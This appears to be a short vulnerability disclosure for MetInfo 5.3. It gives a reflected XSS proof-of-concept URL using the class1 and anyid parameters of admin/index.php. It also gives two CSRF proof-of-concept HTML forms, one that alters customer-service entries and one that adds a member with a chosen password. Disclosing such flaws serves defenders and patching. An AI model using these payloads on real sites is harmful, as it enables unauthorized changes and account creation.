XSS
MetInfo5.3 application is vulnerable to Cross-Site scripting (XSS) vulnerabilities. Attackers can inject arbitrary web script or HTML via the class1 parameter or the anyid parameter to admin/index.php.
Vulnerability parameter:&class1、&anyid
Poc:
http://127.0.0.1/MetInfo5.3/admin/index.php?n=content&c=article_admin&a=doindex&class1=2"><script>alert(111)</script>&lang=cn&anyid=29"><script>alert(111)<%2fscript>CSRF-1
MetInfo5.3 application is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability. A successful CSRF attack can force the administrator to add an malicious online customer service.
Poc:
<html>
<body>
<form action="http://127.0.0.1/MetInfo5.3/admin/interface/online/delete.php?anyid=71&lang=cn&class1=" method="POST">
<input type="hidden" name="allid" value="6," />
<input type="hidden" name="action" value="editor" />
<input type="hidden" name="id" value="6" />
<input type="hidden" name="no_order_6" value="1" />
<input type="hidden" name="name_6" value="mm" />
<input type="hidden" name="qq_6" value="123123" />
<input type="hidden" name="msn_6" value="" />
<input type="hidden" name="taobao_6" value="mm123" />
<input type="hidden" name="alibaba_6" value="mm123" />
<input type="hidden" name="skype_6" value="" />
<input type="hidden" name="saveorder" value="保存" />
<input type="hidden" name="action_type" value="del" />
<input type="hidden" name="allid" value="6," />
<input type="submit" value="Submit request" />
</form>
</body>
</html>Before the attack:


CSRF-2
MetInfo5.3 application is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability. A successful CSRF attack can force the administrator to add a member with specialized username and password.
Poc:
<html>
<body>
<form action="http://127.0.0.1/MetInfo5.3/admin/index.php?lang=cn&anyid=73&n=user&c=admin_user&a=doaddsave" method="POST">
<input type="hidden" name="username" value="www" />
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="groupid" value="1" />
<input type="hidden" name="valid" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>


